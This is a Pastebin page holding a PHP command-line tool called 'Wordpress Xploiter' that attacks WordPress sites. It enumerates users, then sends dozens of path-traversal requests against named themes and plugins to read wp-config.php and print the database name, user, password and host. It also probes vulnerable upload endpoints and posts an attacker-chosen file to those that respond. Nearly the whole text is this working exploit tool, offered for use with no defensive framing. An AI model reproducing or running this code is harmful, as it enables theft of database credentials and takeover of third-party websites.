API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

Wordpress Xploiter

AZZATSSINS_CYBERSERK
Jun 9th, 2017
1,334
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.05 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('error_log',NULL);
  5. @ini_set('log_errors',0);
  6. @ini_set('max_execution_time',0);
  7. @ini_set('display_errors', 0);
  8. @set_time_limit(0);
  9. /*
  10. AUTHOR : AZZATSSINS CYBERSERKERS
  11. */
  12.  
  13. function curl($azx,$anu,$fl){
  14. $post = array($anu => "@$fl");
  15. $ch2 = curl_init ($azx);
  16. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  17. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  18. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  19. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  20. curl_setopt ($ch2, CURLOPT_POST, 1);
  21. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  22. echo curl_exec ($ch2);}
  23. echo "   ___ ________  ___ ___________________  ______\n  / _ /_  /_  / / _ /_  __/ __/ __/  _/ |/ / __/\n / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ //    /\ \  \n/_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/  \n                                                \n";
  24. $azz=$argv[1];
  25. $fl=$argv[2];
  26. $ch = curl_init();
  27. curl_setopt($ch, CURLOPT_URL, "$azz");
  28. curl_setopt($ch, CURLOPT_HEADER, 1);
  29. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  30. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  31. $get = curl_exec($ch);
  32. curl_close($ch);
  33.     if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  34.     $str = str_replace('/>', "", $version[0]);
  35.     $str = str_replace('"', "", $str);
  36.    
  37.     $users = @file_get_contents("$azz/?author=1");
  38.     preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  39.     $wpuser = explode('|',$user[1]);
  40.  
  41. echo " \n_______________________________________________________________\n";
  42. echo "Site : ".$azz."\n WP User : ".$wpuser[0]."\n Version : ".$str."\n"; }
  43. $expl = array("/wp-admin/admin-ajax.php?action=importCSVIPCloud&filename=../ ../../wp-config.php","/wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php","/wp-content/themes/felis/download.php?file=../wp-config.php","/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php","/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php","wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php","/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php","/wp-content/themes/markant/download.php?file=../../wp-config.php","/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php","/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php","/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php","/wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php","/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php","/wp-content/themes/yakimabait/download.php?file=../wp-config.php","/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php","/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php","/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php","/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php","/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php","/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php","/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php","/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php","/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php","/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php","/wp-content/themes/jarida/download.php?uri=../../../wp-config.php","/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php","/wp-content/themes/tess/download.php?file=../../../wp-config.php","/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php","/wp-content/themes/business-essentials-wp/download.php?file=../../../../wp-config.php","/wp-content/themes/abeta/download.php?arquivo=../../../wp-config.php","/wp-content/themes/wetzel/file-download.php?file=../../../wp-config.php","/wp-content/themes/mRoriz/download.php?filename=../../../../wp-config.php","/wp-content/themes/stt/noticias/download.php?file=../../../../wp-config.php","/wp-content/themes/githook/themessageofchristmas/pdf/download.php?file=../../../../../wp-config.php","/wp-content/themes/icelegacy/download.php?f=../../../wp-config.php","/wp-content/themes/hustle/down.php?f=../../../wp-config.php","/wp-content/themes/copthorne3.0/includes/year3/process.php?file=../../../../../wp-config.php","/wp-content/themes/akademie/download.php?pfad=../../../wp-config.php","/wp-content/themes/gt/download.php?file=../../../wp-config.php","/wp-content/themes/twentyeleven/download.php?file=../../../wp-config.php","/wp-download.php?file=wp-config.php");
  44. foreach($expl as $exploit){
  45. $ch = curl_init();
  46. curl_setopt($ch, CURLOPT_URL, "$azz/$exploit");
  47. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  48. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  49. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  50. $xp = curl_exec ($ch);
  51. curl_close($ch);
  52. if(preg_match("#DB_USER#i",$xp)){
  53. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  54. echo "DB_NAME:{$DB_NAME[1]}\n";
  55. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  56. echo "DB_USER:{$DB_USER[1]}\n";
  57. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  58. echo "DB_PASSWORD:{$DB_PASSWORD[1]}\n";
  59. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  60. echo "DB_HOST:{$DB_HOST[1]}\n";
  61. }}
  62. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
  63. foreach($lt as $l){
  64. $azz = "$azz/$l";
  65. $process = curl_init($azz);
  66. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  67. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  68. curl_setopt($process, CURLOPT_HEADER, TRUE);
  69. curl_setopt($process, CURLOPT_POST, 1);
  70. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
  71. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  72. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  73. $return = curl_exec($process);
  74. if(preg_match("#DB_USER#i",$return)){
  75. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  76. echo "DB_NAME:{$DB_NAME[1]}\n";
  77. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  78. echo "DB_USER:{$DB_USER[1]}\n";
  79. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  80. echo "DB_PASSWORD:{$DB_PASSWORD[1]}\n";
  81. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  82. echo "DB_HOST:{$DB_HOST[1]}\n";
  83. break;
  84. echo " \n_______________________________________________________________</br>";
  85. }
  86. }
  87. echo "\nChoose Post Name: \n1 : file\n2 : Filedata\n3 : qqfile\n4 : FileToUpload\n5 : file[]\n";
  88. echo "\nPost Name: ";
  89. $pn=trim(fgets(STDIN,1024));
  90. if($pn == 1){
  91. $expl = array("/jm-ajax/upload_file/","/wp-content/plugins/
  92. Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php","/wp-content/themes/honestkim/js/redactor/demo/scripts/file_upload.php","/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
  93. foreach($expl as $vuln){
  94. $azx = $azz.$vuln;
  95. $ch = curl_init($azx);
  96. curl_setopt($ch, CURLOPT_NOBODY, true);
  97. curl_exec($ch);
  98. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  99. curl_close($ch);
  100. if($status_code==200)
  101. {
  102. echo "\n[!] Found : ".$azx."\n";
  103. curl($azx,"file",$fl);
  104. }}
  105. }elseif($pn == 2){
  106. $expl = array("/wp-content/themes/dandelion/functions/upload-handler.php","/wp-content/plugins/wordpress-member-private-conversation/doupload.php","/wp-content/themes/Elemin/themify/themify-ajax.php?upload=1","/wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1","/wp-content/themes/Tisa/themify/themify-ajax.php?upload=1","/wp-content/themes/Funki/themify/themify-ajax.php?upload=1","/wp-content/themes/Pinboard/themify/themify-ajax.php?upload=1","/wp-content/themes/Folo/themify/themify-ajax.php?upload=1","/wp-content/themes/grido/themify/themify-ajax.php?upload=1","/wp-content/themes/Suco/themify/themify-ajax.php?upload=1","/wp-content/themes/iThemes2/themify/themify-ajax.php?upload=1","/wp-content/themes/fullpane/themify/themify-ajax.php?upload=1","/wp-content/themes/simfo/themify/themify-ajax.php?upload=1","/wp-content/themes/rezo/themify/themify-ajax.php?upload=1","/wp-content/themes/bizco/themify/themify-ajax.php?upload=1","/wp-content/themes/minshop/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-landing/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-elegant/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-base/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-corporate/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-music/themify/themify-ajax.php?upload=1","/wp-content/themes/postline/themify/themify-ajax.php?upload=1","/wp-content/themes/newbasic/themify/themify-ajax.php?upload=1","/wp-content/plugins/viral-optins/api/uploader/file-uploader.php");
  107. foreach($expl as $vuln){
  108. $azx = $azz.$vuln;
  109. $ch = curl_init($azx);
  110. curl_setopt($ch, CURLOPT_NOBODY, true);
  111. curl_exec($ch);
  112. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  113. curl_close($ch);
  114. if($status_code==200)
  115. {
  116. echo "\n[!] Found : ".$azx."\n";
  117. curl($azx,"Filedata",$fl);
  118. }}}elseif($pn == 3){
  119. $expl = array("/wp-content/plugins/complete-gallery-manager/frames/upload-images.php","/wp-content/plugins/complete-gallery-manager/frames/upload-images.php","/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php","/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php");
  120. foreach($expl as $vuln){
  121. $azx = $azz.$vuln;
  122. $ch = curl_init($azx);
  123. curl_setopt($ch, CURLOPT_NOBODY, true);
  124. curl_exec($ch);
  125. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  126. curl_close($ch);
  127. if($status_code==200)
  128. {
  129. echo "\n[!] Found : ".$azx."\n";
  130. curl($azx,"qqfile",$fl);
  131. }}
  132. }elseif($pn == 4){
  133. $expl = array("/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php","/wp-content/plugins/mac-dock-gallery/upload-file.php","/wp-content/themes/kernel-theme/functions/upload-handler.php","/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php","/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
  134. foreach($expl as $vuln){
  135. $azx = $azz.$vuln;
  136. $ch = curl_init($azx);
  137. curl_setopt($ch, CURLOPT_NOBODY, true);
  138. curl_exec($ch);
  139. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  140. curl_close($ch);
  141. if($status_code==200)
  142. {
  143. echo "\n[!] Found : ".$azx."\n";
  144. curl($azx,"FileToUpload",$fl);
  145. }}
  146. }elseif($pn == 5){
  147. $expl = array("/wp-content/themes/organizer/lib_upload/server/php/","/wp-content/plugins/formcraft/file-upload/server/content/upload.php");
  148. foreach($expl as $vuln){
  149. $azx = $azz.$vuln;
  150. $ch = curl_init($azx);
  151. curl_setopt($ch, CURLOPT_NOBODY, true);
  152. curl_exec($ch);
  153. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  154. curl_close($ch);
  155. if($status_code==200)
  156. {
  157. echo "\n[!] Found : ".$azx."\n";
  158. curl($azx,"file[]",$fl);
  159. }}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!